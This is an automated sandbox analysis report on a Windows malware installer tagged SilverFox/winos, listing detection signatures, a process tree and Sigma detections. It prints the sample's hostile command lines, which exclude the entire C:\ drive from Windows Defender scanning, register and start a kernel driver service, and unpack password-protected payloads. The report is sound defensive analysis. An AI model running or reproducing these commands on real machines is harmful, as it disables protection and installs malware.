
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.3.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b2.0.3.exe
renamed because original name is a hash value
Original sample name: 2.0.3.exe
Analysis ID: 1580391
MD5: d81e3f29d547be83a40d0ace4bd86985
SHA1: 623922ffc12a8b5c69215d133b23c4eb75cb5979
SHA256: a6c25c845a00c651e6f35751ca141e18f4065492d9f3720056b5184a2030301e
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b2.0.3.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" MD5: D81E3F29D547BE83A40D0ACE4BD86985)
    • #U5b89#U88c5#U52a9#U624b2.0.3.tmp (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" MD5: 6A58BEB829BD96D5574E24C76DD36FD9)
      • powershell.exe (PID: 3640 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 1812 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.3.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT MD5: D81E3F29D547BE83A40D0ACE4BD86985)
        • #U5b89#U88c5#U52a9#U624b2.0.3.tmp (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT MD5: 6A58BEB829BD96D5574E24C76DD36FD9)
          • 7zr.exe (PID: 4476 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 2140 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2140 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 6084 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2360 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 940 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1896 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6188 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5240 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6188 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6412 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2360 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5496 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 940 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3500 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1896 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6152 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5880 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6084, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6640, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6084, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6640, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac; ReversingLabs: Detection: 23%
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000D.00000003.2206263552.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2206996636.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp; Code function: 7_2_6C0AB430 FindFirstFileA,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_003C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_003C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
